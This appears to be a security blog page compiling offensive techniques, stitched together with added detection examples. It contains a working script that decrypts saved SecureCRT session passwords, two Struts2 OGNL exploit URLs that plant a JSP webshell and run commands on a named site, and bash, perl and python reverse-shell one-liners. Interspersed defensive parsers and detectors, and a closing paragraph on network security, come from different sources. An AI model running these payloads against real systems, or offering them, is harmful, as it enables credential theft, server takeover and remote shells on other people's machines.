Viewing the password stored in a SecureCRT session configuration file

SecureCRT saves each session's configuration file in the Config folder under C:\Documents and Settings\Administrator\Application Data\VanDyke. Locate the configuration file that corresponds to the session name. The password is not stored in plaintext: the S:"Password" entry holds an encrypted hex blob, which the script below decrypts.

Install Crypto (pycrypto)
https://pypi.python.org/pypi/pycrypto
wget https://pypi.python.org/packages/source/p/pycrypto/pycrypto-2.6.1.tar.gz
tar -zxvf pycrypto-2.6.1.tar.gz
cd pycrypto-2.6.1
python setup.py build
python setup.py install
If the build fails, install python-devel:
yum install python-devel

Python code (Python 2, using pycrypto's Blowfish API)

from Crypto.Cipher import Blowfish
import argparse
import re

# The stored value is hex. It is Blowfish-CBC encrypted twice with fixed
# keys and a zero IV: the outer layer uses key c2; after dropping 4 bytes
# from each end of that result, the inner layer uses key c1.
def decrypt(password) :
    c1 = Blowfish.new('5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8)
    c2 = Blowfish.new('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'.replace(' ','').decode('hex'), Blowfish.MODE_CBC, '\x00'*8)
    padded = c1.decrypt(c2.decrypt(password.decode('hex'))[4:-4])
    # The plaintext is UTF-16 text terminated by a two-byte NUL; copy up to
    # the terminator. The length check stops the loop on a malformed blob
    # (wrong format or key) that has no terminator at all.
    p = ''
    while len(padded) >= 2 and padded[:2] != '\x00\x00' :
        p += padded[:2]
        padded = padded[2:]
    return p.decode('UTF-16')

# Fields of interest in the session .ini: S:"name"=value holds strings
# (the password value carries a 'u' prefix before the hex blob), and the
# D:"name"=value port entry is a DWORD written as 8 hex digits.
REGEX_HOSTNAME = re.compile(ur'S:"Hostname"=([^\r\n]*)')
REGEX_PASSWORD = re.compile(ur'S:"Password"=u([0-9a-f]+)')
REGEX_PORT = re.compile(ur'D:"\[SSH2\] Port"=([0-9a-f]{8})')
REGEX_USERNAME = re.compile(ur'S:"Username"=([^\r\n]*)')

def hostname(x) :
    m = REGEX_HOSTNAME.search(x)
    if m :
        return m.group(1)
    return '???'

def password(x) :
    m = REGEX_PASSWORD.search(x)
    if m :
        return decrypt(m.group(1))
    return '???'

def port(x) :
    m = REGEX_PORT.search(x)
    if m :
        return '-p %d '%(int(m.group(1), 16))
    return ''

def username(x) :
    m = REGEX_USERNAME.search(x)
    if m :
        return m.group(1) + '@'
    return ''

parser = argparse.ArgumentParser(description='Tool to decrypt SSHv2 passwords in VanDyke Secure CRT session files')
parser.add_argument('files', type=argparse.FileType('r'), nargs='+',
                    help='session file(s)')

args = parser.parse_args()

for f in args.files :
    # The .ini is UTF-16 on disk; stripping the NUL bytes leaves the ASCII
    # text the regexes above expect.
    c = f.read().replace('\x00', '')
    print f.name
    print "ssh %s%s%s # %s"%(port(c), username(c), hostname(c), password(c))
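As an added example, not part of the original script, here is a Python 3 parser for the same session .ini fields, together with the terminator scan from decrypt() rewritten to stop at the end of the buffer instead of looping. It assumes the session file is UTF-16 text with a BOM (what the NUL-stripping in the script above implies) and treats BOM-less single-byte files as latin-1; both the sample file and its password hex are constructed here, so the password is extracted but not decrypted (that still requires the Blowfish step above).

```python
import re

# Constructed sample of a SecureCRT session .ini (not a real capture).
# The password hex is a made-up value; only its extraction is shown here.
SAMPLE_INI_TEXT = (
    'S:"Hostname"=bastion.example.internal\r\n'
    'D:"[SSH2] Port"=00000016\r\n'
    'S:"Username"=ops\r\n'
    'S:"Password"=u0a1b2c3d4e5f60718293a4b5c6d7e8f9\r\n'
)
# Assumption: the file on disk is UTF-16 with a BOM, which is what the
# NUL-stripping in the decryption script above implies.
SAMPLE_INI = SAMPLE_INI_TEXT.encode('utf-16')

FIELDS = {
    'hostname': re.compile(r'S:"Hostname"=([^\r\n]*)'),
    'username': re.compile(r'S:"Username"=([^\r\n]*)'),
    # D: values are DWORDs written as 8 hex digits
    'port_hex': re.compile(r'D:"\[SSH2\] Port"=([0-9a-fA-F]{8})'),
    # the 'u' prefix precedes the hex blob that the script above decrypts
    'password_hex': re.compile(r'S:"Password"=u([0-9a-fA-F]+)'),
}


def decode_session(raw: bytes) -> str:
    """Decode the file honouring a UTF-16 BOM; treat BOM-less data with
    embedded NULs as UTF-16LE and anything else as single-byte text."""
    if raw[:2] in (b'\xff\xfe', b'\xfe\xff'):
        return raw.decode('utf-16')
    if b'\x00' in raw:
        return raw.decode('utf-16-le')
    return raw.decode('latin-1')


def parse_session(raw: bytes) -> dict:
    """Extract the connection fields; 'port' is the D: value as an int,
    or None when the file has no [SSH2] Port entry."""
    text = decode_session(raw)
    out = {}
    for name, rx in FIELDS.items():
        m = rx.search(text)
        out[name] = m.group(1) if m else None
    out['port'] = int(out['port_hex'], 16) if out['port_hex'] else None
    return out


def unpad_utf16(padded: bytes) -> str:
    """The terminator scan from decrypt() in Python 3: the decrypted buffer
    is UTF-16LE text ended by a two-byte NUL, then padding. Raises instead
    of looping forever when no terminator exists (e.g. a malformed blob)."""
    for i in range(0, len(padded) - 1, 2):
        if padded[i:i + 2] == b'\x00\x00':
            return padded[:i].decode('utf-16-le')
    raise ValueError('no UTF-16 terminator: not a valid decrypted password')


def ssh_command(raw: bytes) -> str:
    """Same ssh line the script above prints, minus the password comment."""
    s = parse_session(raw)
    port = '-p %d ' % s['port'] if s['port'] is not None else ''
    user = s['username'] + '@' if s['username'] else ''
    return 'ssh %s%s%s' % (port, user, s['hostname'] or '???')


if __name__ == '__main__':
    print(parse_session(SAMPLE_INI))
    print(ssh_command(SAMPLE_INI))
```

Decoding the file as UTF-16 rather than deleting NUL bytes matters when a hostname or username contains non-ASCII characters; the NUL-stripping shortcut silently corrupts those.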

Struts2 code-execution exploitation tools and exploits

Writing a one-line JSP webshell (the JSP source travels in the content parameter and is written under the webroot as /itest.jsp):

http://cls.pw/Index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=%2fitest.jsp&content=%3C%25if%28request.getParameter%28%22f%22%29%21%3Dnull%29%28new%20java.io.FileOutputStream%28application.getRealPath%28%22%5C%5C%22%29%2brequest.getParameter%28%22f%22%29%29%29.write%28request.getParameter%28%22t%22%29.getBytes%28%29%29%3B%25%3E

Echoing command output (the command is the third cls_cmd value, here id; the first 100 characters of its output are written to the response):

http://cls.pw/Index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.cls_cmd[0],%23b%3d%23parameters.cls_cmd[1],%23c%3d%23parameters.cls_cmd[2],%23j%3d(new+java.lang.ProcessBuilder(new+java.lang.String[]{%23c})).start(),%23k%3d%23j.getInputStream(),%23l%3dnew+java.io.InputStreamReader(%23k),%23m%3dnew+java.io.BufferedReader(%23l),%23n%3dnew+char[100],%23m.read(%23n),%23req%3d%23context.get(%23a),%23cls%3d%23context.get(%23parameters.cls_cmd[1]),%23cls.getWriter().println(%23n),%23cls.getWriter().flush(),%23cls.getWriter().close(),1?%23pr:%23request.toString&cls_cmd=com.opensymphony.xwork2.dispatcher.HttpServletRequest&cls_cmd=com.opensymphony.xwork2.dispatcher.HttpServletResponse&cls_cmd=id

Two exploitation tools:

Struts032 exploitation tool 1

Struts032 exploitation tool 2
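As an added example (not from the original post or either tool), here is detection logic for the request shape used by the two payloads above: the OGNL expression rides in a parameter name after the method: prefix, disables the sandbox with #_memberAccess, and reaches Java classes through #context.get and #parameters indirection. The scanner decodes the query, checks for those markers, and resolves the #parameters.<name>[<index>] references so an analyst sees the actual file path, JSP body or command the request carried. The request lines are constructed here (the first two are the URLs above); the marker list is an assumption drawn from those two payloads, not a complete Struts signature.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed request lines (not a real log). The first two are the payload
# URLs shown above; the third also uses the "method:" prefix but carries no
# OGNL, to show the prefix alone must not fire.
SAMPLE_REQUESTS = [
    "http://cls.pw/Index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=%2fitest.jsp&content=%3C%25if%28request.getParameter%28%22f%22%29%21%3Dnull%29%28new%20java.io.FileOutputStream%28application.getRealPath%28%22%5C%5C%22%29%2brequest.getParameter%28%22f%22%29%29%29.write%28request.getParameter%28%22t%22%29.getBytes%28%29%29%3B%25%3E",
    "http://cls.pw/Index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.cls_cmd[0],%23b%3d%23parameters.cls_cmd[1],%23c%3d%23parameters.cls_cmd[2],%23j%3d(new+java.lang.ProcessBuilder(new+java.lang.String[]{%23c})).start(),%23k%3d%23j.getInputStream(),%23l%3dnew+java.io.InputStreamReader(%23k),%23m%3dnew+java.io.BufferedReader(%23l),%23n%3dnew+char[100],%23m.read(%23n),%23req%3d%23context.get(%23a),%23cls%3d%23context.get(%23parameters.cls_cmd[1]),%23cls.getWriter().println(%23n),%23cls.getWriter().flush(),%23cls.getWriter().close(),1?%23pr:%23request.toString&cls_cmd=com.opensymphony.xwork2.dispatcher.HttpServletRequest&cls_cmd=com.opensymphony.xwork2.dispatcher.HttpServletResponse&cls_cmd=id",
    "http://cls.pw/Index.action?method:list&page=2",
]

# Substrings characteristic of the injected expressions above (assumption:
# derived from those two payloads, not an exhaustive signature).
OGNL_MARKERS = (
    '#_memberAccess',
    '@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS',
    '#context.get(',
    'java.lang.ProcessBuilder',
    'java.io.FileOutputStream',
)
# Indirection the payloads use to pull attacker values from other
# query parameters: #parameters.<name>[<index>]
PARAM_REF = re.compile(r'#parameters\.(\w+)\[(\d+)\]')


def decode_query(url: str) -> dict:
    """Query as {name: [values]} with percent-encoding and '+' decoded.
    The OGNL expression travels in a parameter *name* (after 'method:'),
    so names are kept intact as keys and inspected too."""
    params = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        params.setdefault(name, []).append(value)
    return params


def find_ognl_injection(url: str):
    """Return None for a clean request; otherwise the markers hit and the
    attacker-supplied values the expression references by indirection,
    resolved from the same query (this is what gets written or executed)."""
    params = decode_query(url)
    names = [n for n in params if n.startswith('method:')]
    if not names:
        return None
    expr = ' '.join(names)
    markers = [m for m in OGNL_MARKERS if m in expr]
    if not markers:
        return None
    resolved = {}
    for name, idx in PARAM_REF.findall(expr):
        values = params.get(name, [])
        i = int(idx)
        resolved['%s[%s]' % (name, idx)] = values[i] if i < len(values) else None
    return {'markers': markers, 'resolved': resolved}


def scan(requests):
    """(index, finding) for every flagged request line."""
    hits = []
    for i, url in enumerate(requests):
        finding = find_ognl_injection(url)
        if finding:
            hits.append((i, finding))
    return hits


if __name__ == '__main__':
    for i, finding in scan(SAMPLE_REQUESTS):
        print(i, finding['markers'])
        for ref, value in finding['resolved'].items():
            print('   ', ref, '=', (value or '')[:60])
```

Resolving the indirection is the useful part in incident response: the expression itself only says "write #parameters.content[0] to #parameters.reqobj[2]", while the resolved view shows the dropped path (/itest.jsp) and the JSP body, or the command (id) in the second payload.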


Reverse shells

bash version:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

perl version:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python version:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
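From the defender's side, as an added example that is not part of the original post: a small classifier for process command lines that recognizes the three one-liner shapes above and pulls out the listener host and port, the kind of check one runs over EDR or auditd process-start records. The command lines are constructed here (the three shells use the 10.0.0.1 listener from the page; two benign lines show that socket use or a /dev/null redirect alone does not fire), and the rules are assumptions fitted to exactly these three forms rather than a general reverse-shell signature.

```python
import re

# Constructed process-start records (command lines only, not a real capture).
# Lines 0-2 are the reverse shells listed above; lines 3-4 are benign.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1",
    "perl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
    "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "python -c 'import json,sys;print(json.load(sys.stdin))'",
    "bash -c 'cat /dev/null > /tmp/x'",
]

HOST = r'([0-9A-Za-z.\-]+)'
# Each rule: (technique label, regex capturing (host, port), substrings that
# must ALL be present before the rule fires). Assumption: fitted to the
# three one-liners above, not a general signature.
RULES = [
    ('bash /dev/tcp redirect',
     re.compile(r'/dev/tcp/' + HOST + r'/(\d+)'),
     ['/dev/tcp/']),
    ('perl Socket connect + exec',
     re.compile(r'\$i="' + HOST + r'";\s*\$p=(\d+)'),
     ['use Socket', 'connect(', 'exec(']),
    ('python socket + dup2',
     re.compile(r'connect\(\("' + HOST + r'",\s*(\d+)\)\)'),
     ['socket.socket(', 'dup2(', 'connect((']),
]


def classify(cmdline: str):
    """Return (technique, host, port) for a command line matching one of
    the shapes above, or None. Requiring every needle keeps ordinary socket
    code or /dev/null redirects from firing. When the shape matches but the
    endpoint is not a literal (e.g. taken from a shell variable), host and
    port come back as None so the hit is still reported."""
    for label, endpoint_rx, needles in RULES:
        if all(n in cmdline for n in needles):
            m = endpoint_rx.search(cmdline)
            if m:
                return (label, m.group(1), int(m.group(2)))
            return (label, None, None)
    return None


def scan(cmdlines):
    """(index, classification) for every flagged command line."""
    return [(i, r) for i, r in ((i, classify(c)) for i, c in enumerate(cmdlines)) if r]


if __name__ == '__main__':
    for i, (label, host, port) in scan(SAMPLE_CMDLINES):
        print('%d: %s -> %s:%s' % (i, label, host, port))
```

The extracted host:port is the pivot for the rest of the investigation (firewall and flow logs for the same destination), which is why the classifier reports it rather than just a boolean.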


The barrel principle: the missing security awareness

Network security means that the hardware, software and data of a network system are protected from damage, alteration or disclosure caused by accidental or malicious events, that the system keeps running reliably and continuously, and that network services are not interrupted.

A service provider hands a user a box; the user puts documents into it; one key opens one box, and the user opens their own box with their own key. This box for holding documents has confidentiality, integrity, availability and controllability, and forms a simple model of network security.

The box is not absolutely secure: it is exposed to interference from outside and from within, such as natural disasters, internal information leaks, external information leaks, hacker attacks and computer failures. Security management policies exist to keep these from happening.
